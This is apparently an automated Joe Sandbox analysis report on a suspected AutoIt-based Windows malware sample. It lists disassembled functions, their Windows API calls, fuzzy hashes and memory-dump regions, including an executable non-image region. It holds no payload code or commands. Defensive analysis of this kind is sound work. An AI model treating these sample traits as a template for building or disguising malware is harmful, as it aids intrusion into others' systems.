                          • Instruction ID: a2ead5aec99a97718dbdbe7ae85fde52c3638a7c1cf4917d3d38ca907024bc1a
                          • Opcode Fuzzy Hash: d13559f202c12981918ea1e41a88216e30caa4b2d56e461778a70d7ee4c6dfcd
                          • Instruction Fuzzy Hash: 161127B1600206EACF10BB60DC0BFAD77E4AF40711F10852DF642A61C1EFB8AA059B50
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: __wsopen_s
                          • String ID:
                          • API String ID: 3347428461-0
                          • Opcode ID: 2596838ea0aa6db92968e95934fcc28e7d82d69b9d4ceb45836c8c2978691e89
                          • Instruction ID: aad7e28aae462a080ef95f8e1f5c8d76d0beb6fd23ad48178d3fd82b870303ab
                          • Opcode Fuzzy Hash: 2596838ea0aa6db92968e95934fcc28e7d82d69b9d4ceb45836c8c2978691e89
                          • Instruction Fuzzy Hash: 4211487190420AAFDF05DF58E94499A7BF4EF48300F104059F808AB312DB31EA11CBA5
                          APIs
                          • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0070543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00709A9C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: ef818420cad98d1bf10a764d3f564d06dd4e43a944f0fc5db67918e15defe028
                          • Instruction ID: faac59267ca6f69159ee3db69866a2c905e46a36356b5413744c5d29c095342d
                          • Opcode Fuzzy Hash: ef818420cad98d1bf10a764d3f564d06dd4e43a944f0fc5db67918e15defe028
                          • Instruction Fuzzy Hash: 20113671204705DFDB20CE09C880B66B7E9AB44764F10C52EEA9B8AA92C778E945CB60
                          APIs
                            • Part of subcall function 00734C7D: RtlAllocateHeap.NTDLL(00000008,00701129,00000000,?,00732E29,00000001,00000364,?,?,?,0072F2DE,00733863,007D1444,?,0071FDF5,?), ref: 00734CBE
                          • _free.LIBCMT ref: 0073506C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                          • Instruction ID: 5b015ef142647dc0ef836d283146d716a36ae034d3fa0bd636527d67718b44f9
                          • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                          • Instruction Fuzzy Hash: AE014972204704ABF3358F75D885A5AFBECFB89370F25061DE184932C1EA35A805C7B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                          • Instruction ID: ff5ed68acff3ecbab3d32f4431f3af6e912c538b78e496c1241130bf45f91824
                          • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                          • Instruction Fuzzy Hash: 2AF0F432510A34EBE6313A69AC09B5A33A89F52331F100729F560921D3DB7CA80286A6
                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,00701129,00000000,?,00732E29,00000001,00000364,?,?,?,0072F2DE,00733863,007D1444,?,0071FDF5,?), ref: 00734CBE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: a66b98467020a5530ef098d087997506807d2f829ec1bf9c23c2854c62332ec2
                          • Instruction ID: d9f22e04d88faa2c511b7c373c64ee77361e3e950348358c09e40a758c016367
                          • Opcode Fuzzy Hash: a66b98467020a5530ef098d087997506807d2f829ec1bf9c23c2854c62332ec2
                          • Instruction Fuzzy Hash: 6EF0B432602234A6FB295F62AC09B5A3798BF417A0F15A122F815A6293CA7CFC0146B0
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6,?,00701129), ref: 00733852
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 69dfc540eeb7ec40c48798bc79d0d85d3a6d3c032fdd34ecea490107c900058b
                          • Instruction ID: 7521abc1d9ed14c51fa501d822f4f1fea89f9fee13eaa1cb9b8f63b72a2c2aaf
                          • Opcode Fuzzy Hash: 69dfc540eeb7ec40c48798bc79d0d85d3a6d3c032fdd34ecea490107c900058b
                          • Instruction Fuzzy Hash: 3BE0E532101234AAFA312A66AC05BDA3758AF427B0F050022FC04A25A2CB1DDD0281F8
                          APIs
                          • FreeLibrary.KERNEL32(?,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704F6D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 75c604bbaaf3983eeeae4a949e988a8717622e8c8892173e683fa1e03ce3b287
                          • Instruction ID: 4db22098ba80fc688c94f75b5ac8787187a3293a1d415b2f12e44605fba4fa29
                          • Opcode Fuzzy Hash: 75c604bbaaf3983eeeae4a949e988a8717622e8c8892173e683fa1e03ce3b287
                          • Instruction Fuzzy Hash: 9CF030B1105752CFDB349F64E494822B7E4EF143193188A7EE3DA82551C779A844DF10
                          APIs
                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00702DC4
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LongNamePath_wcslen
                          • String ID:
                          • API String ID: 541455249-0
                          • Opcode ID: a73ce5a10fb14efff8817d70f1b1d743034feb1557a5d3da3c1b2be837a1f098
                          • Instruction ID: 27c0f9e29a5d8daf6498e633b4166fcf12af5742ce933d77dcd0e3b952953ff7
                          • Opcode Fuzzy Hash: a73ce5a10fb14efff8817d70f1b1d743034feb1557a5d3da3c1b2be837a1f098
                          • Instruction Fuzzy Hash: 69E0CDB26001249BCB11E7589C09FDA77EDDFC8790F054171FD09D7248DA64AD858550
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID:
                          • API String ID: 2638373210-0
                          • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                          • Instruction ID: 81c8753999cb9cbf75b6350cd5a54e2b8ac0c0b56389a458e737d69a377dd91a
                          • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                          • Instruction Fuzzy Hash: B0E04FB0609B009FDF3D5A28A8517B677E89F49340F00486EF6AFC2653E57278868A4D
                          APIs
                            • Part of subcall function 00703837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00703908
                            • Part of subcall function 0070D730: GetInputState.USER32 ref: 0070D807
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00702B6B
                            • Part of subcall function 007030F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0070314E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: IconNotifyShell_$CurrentDirectoryInputState
                          • String ID:
                          • API String ID: 3667716007-0
                          • Opcode ID: 97ba2ec492a07caaf123053c8efa2522f1c12a5bb9137a1bee13278dec0ff146
                          • Instruction ID: a0372b331140ac0fc691f83e6959d9226e4edeaf38b6dae853b6fe66a2afc86e
                          • Opcode Fuzzy Hash: 97ba2ec492a07caaf123053c8efa2522f1c12a5bb9137a1bee13278dec0ff146
                          • Instruction Fuzzy Hash: EBE08662304244D7CA04BBB4985A57DB7DD9BD1351F40573FF142432E3DE2C49464252
                          APIs
                          • GetFileAttributesW.KERNELBASE(?), ref: 025308EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                          • Instruction ID: 0f8d4b9e0cf2a2c75acfa6d8215d997a400b1ddc1b372ccb2e2a99e7067ab747
                          • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                          • Instruction Fuzzy Hash: A8E0C272A0530CEBEB21CBBCDC08AAE77A8FB04320F004B54F81AC32C0D6308A40D758
                          APIs
                          • GetFileAttributesW.KERNELBASE(?), ref: 025308BB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                          • Instruction ID: 788527f6d940bafbea5d29d46b16566bec938dad0d7f3249c3028c471eeb8e2f
                          • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                          • Instruction Fuzzy Hash: 77D0A73090630CEBCB10CFB89C04ADAB7A8EB04330F004754FD15D32C0D63199409794
                          APIs
                          • CreateFileW.KERNELBASE(00000000,00000000,?,00740704,?,?,00000000,?,00740704,00000000,0000000C), ref: 007403B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 48229f700b6d0411db6ee197a228b00e7d218df2bb1a6fb5d24e90e5bd367312
                          • Instruction ID: 277f44f106ebd114c53dd7436127ff0e821b0d458e9fc318f432b37aee4c1359
                          • Opcode Fuzzy Hash: 48229f700b6d0411db6ee197a228b00e7d218df2bb1a6fb5d24e90e5bd367312
                          • Instruction Fuzzy Hash: 03D06C3204010DBBDF028F84DD06EDA3BAAFB48714F018000BE1856020C736E822AB98
                          APIs
                          • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00701CBC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: InfoParametersSystem
                          • String ID:
                          • API String ID: 3098949447-0
                          • Opcode ID: 753c7ef9f1badbe84d56a3d9c76acca532267d24d2cc4c5e645a5c7fb3125c88
                          • Instruction ID: b1b6fb201874068e682ace97bd3e0bbc021a85b1825b02652cd074928f073bb0
                          • Opcode Fuzzy Hash: 753c7ef9f1badbe84d56a3d9c76acca532267d24d2cc4c5e645a5c7fb3125c88
                          • Instruction Fuzzy Hash: A3C09B35281304AFF6154784BC5BF107774A358B00F54C003F609555E3C3A51431D658
                          APIs
                            • Part of subcall function 00705745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0070949C,?,00008000), ref: 00705773
                          • GetLastError.KERNEL32(00000002,00000000), ref: 007776DE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateErrorFileLast
                          • String ID:
                          • API String ID: 1214770103-0
                          • Opcode ID: 1e64b1a89337e43d7de98ccdbc012f704f9c3ce4592e65c7b761e85beb48638e
                          • Instruction ID: d20b79c608d3b1fbc1500d4a7c04db1f72482f823989b51dbc7108f863db5156
                          • Opcode Fuzzy Hash: 1e64b1a89337e43d7de98ccdbc012f704f9c3ce4592e65c7b761e85beb48638e
                          • Instruction Fuzzy Hash: E3817230608701DFCB19EF28C495A69B7E1BF49354F04865DF88A9B2D2DB38AD45CB92
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction ID: afcec2a5ce6bb7006ed8928729a84ed38ebb066c1480d7245a1d3107416923cd
                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction Fuzzy Hash: 83310674A00109DBC718DF5DE4909A9F7A1FF89300B2486A5E84ACF695D735EDC1DBD0
                          APIs
                          • Sleep.KERNELBASE(000001F4), ref: 025322C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction ID: 3e04ed417243eb81785538d1c8a46bd56390a10d8d14c1beddf0ebaf76fdd08a
                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction Fuzzy Hash: 2EE0E67494010DDFDB00EFB4D94969E7FB4FF04301F100161FD01D2280D6309D508A62
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0079961A
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0079965B
                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0079969F
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007996C9
                          • SendMessageW.USER32 ref: 007996F2
                          • GetKeyState.USER32(00000011), ref: 0079978B
                          • GetKeyState.USER32(00000009), ref: 00799798
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007997AE
                          • GetKeyState.USER32(00000010), ref: 007997B8
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007997E9
                          • SendMessageW.USER32 ref: 00799810
                          • SendMessageW.USER32(?,00001030,?,00797E95), ref: 00799918
                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0079992E
                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00799941
                          • SetCapture.USER32(?), ref: 0079994A
                          • ClientToScreen.USER32(?,?), ref: 007999AF
                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007999BC
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007999D6
                          • ReleaseCapture.USER32 ref: 007999E1
                          • GetCursorPos.USER32(?), ref: 00799A19
                          • ScreenToClient.USER32(?,?), ref: 00799A26
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00799A80
                          • SendMessageW.USER32 ref: 00799AAE
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00799AEB
                          • SendMessageW.USER32 ref: 00799B1A
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00799B3B
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00799B4A
                          • GetCursorPos.USER32(?), ref: 00799B68
                          • ScreenToClient.USER32(?,?), ref: 00799B75
                          • GetParent.USER32(?), ref: 00799B93
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00799BFA
                          • SendMessageW.USER32 ref: 00799C2B
                          • ClientToScreen.USER32(?,?), ref: 00799C84
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00799CB4
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00799CDE
                          • SendMessageW.USER32 ref: 00799D01
                          • ClientToScreen.USER32(?,?), ref: 00799D4E
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00799D82
                            • Part of subcall function 00719944: GetWindowLongW.USER32(?,000000EB), ref: 00719952
                          • GetWindowLongW.USER32(?,000000F0), ref: 00799E05
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                          • String ID: @GUI_DRAGID$F$p#}
                          • API String ID: 3429851547-3317532684
                          • Opcode ID: 28ddc294a7697689253a7e24d7c92c40c5c85117e7a023da9a3a49c4a5a26550
                          • Instruction ID: 8552649ccd0e769501ced7890e6c1a130604db29f6370fbed31be11f0984fcb7
                          • Opcode Fuzzy Hash: 28ddc294a7697689253a7e24d7c92c40c5c85117e7a023da9a3a49c4a5a26550
                          • Instruction Fuzzy Hash: 4442AD31204240EFEB25CF68DC48AAABBF5FF49310F10465EF699872A1D739E891CB55
                          APIs
                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 007948F3
                          • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00794908
                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00794927
                          • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0079494B
                          • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0079495C
                          • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0079497B
                          • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007949AE
                          • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 007949D4
                          • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00794A0F
                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00794A56
                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00794A7E
                          • IsMenu.USER32(?), ref: 00794A97
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00794AF2
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00794B20
                          • GetWindowLongW.USER32(?,000000F0), ref: 00794B94
                          • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00794BE3
                          • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00794C82
                          • wsprintfW.USER32 ref: 00794CAE
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00794CC9
                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00794CF1
                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00794D13
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00794D33
                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00794D5A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
